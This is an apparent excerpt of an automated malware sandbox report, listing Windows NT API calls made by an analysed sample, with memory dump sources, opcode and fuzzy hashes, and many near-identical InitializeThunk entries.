                                                • Instruction ID: 046ff59bb8e44ad8641c0e43070f5aeaf3db9792b4ffc4f87dfb9ba9f6fb7e9c
                                                • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                • Instruction Fuzzy Hash: D70112B5D4010DB7DF10EAE5DC42FDEB378AB54318F1041A5E908A7281F635EB54C795
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 1505d2c2fac7169f29cf6ab97caa2a59105c471fc85729d0552dd22f4c6ed161
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: D7F0B6B2200208ABCB48CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00408AE3,?,00413B87,00408AE3,FFFFFFFF,?,?,FFFFFFFF,00408AE3,00413B87,?,00408AE3,00000060,00000000,00000000), ref: 004181FD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 41c3d68103359e1c773ca3a178cb2552250053742403530653463298fe6cdc4d
                                                • Instruction ID: 19988414748f7d2234e84b46d70596032b11618dde2c3c740e6c0ae0cb1af1ba
                                                • Opcode Fuzzy Hash: 41c3d68103359e1c773ca3a178cb2552250053742403530653463298fe6cdc4d
                                                • Instruction Fuzzy Hash: E2F0F4B2204148ABCB08CF98DC84CEB77ADBF8C314B15864DFA1C93201D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F84,?,00000000,?,00003000,00000040,00000000,00000000,00408AE3), ref: 004183C9
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: c1f36b05bbd4b7963809c3793a6f2df241a2ee7dc34c60eca979b2d1d68cf477
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 1DF015B2200208ABCB14DF89DC81EEB77ADAF88754F118149BE0897241CA30F810CBE4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: acb8c49b5b6d70d0611c624ed9aa2c3715aa566e6196b54c66edeab2cea34608
                                                • Instruction ID: f958d59609f9781ef2151cd425ec4c47c2d5b5abf9750f5d8e38bc7c5441401d
                                                • Opcode Fuzzy Hash: acb8c49b5b6d70d0611c624ed9aa2c3715aa566e6196b54c66edeab2cea34608
                                                • Instruction Fuzzy Hash: 02E086716005007BDB20EFA4CC86EDB7728EF443A0F114559B91C9B243D631A5008BD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtClose.NTDLL(00413D20,?,?,00413D20,00408AE3,FFFFFFFF), ref: 00418305
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: hA
                                                • API String ID: 1279760036-1221461045
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418528
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520140049.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.520442936.0000000000A30000.00000040.00000001.sdmp, Offset: 00A20000, based on PE: true
                                                • Associated: 00000007.00000002.520433882.0000000000A20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520510396.0000000000B10000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520516492.0000000000B20000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520522243.0000000000B24000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520527371.0000000000B27000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520532501.0000000000B30000.00000040.00000001.sdmp
                                                • Associated: 00000007.00000002.520559186.0000000000B90000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
